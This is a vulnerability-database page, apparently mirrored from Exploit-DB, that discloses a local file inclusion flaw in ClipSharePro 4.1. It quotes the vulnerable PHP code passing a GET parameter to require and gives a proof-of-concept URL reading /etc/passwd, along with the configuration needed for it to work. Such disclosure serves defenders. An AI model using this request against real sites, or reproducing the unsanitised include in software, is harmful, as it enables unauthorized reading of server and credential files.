Vulners
Lucene search
ClipSharePro 4.1 - Local File Inclusion
# Exploit Title : ClipSharePro <= 4.1 Local File Inclusion
# Date : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Local File Inclusion
ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through
which attacker can include arbitrary file in webapp.
LFI in ubr_link_upload.php
Poc code
if($MULTI_CONFIGS_ENABLED){
if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
}
else{ $config_file = $DEFAULT_CONFIG; }
// Load config file
require $config_file; //including arbitrary file $_GET['config_file']
echo $config_file;
The vulnerability can be exploited as..
http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd
For sucessfully exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file..
In ubr_ini.php
$MULTI_CONFIGS_ENABLED = 1; --->This value should have to be 1
#Independent Pakistani Security ResearcherData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2014 00:00Current
7.4High risk
Vulners AI Score7.4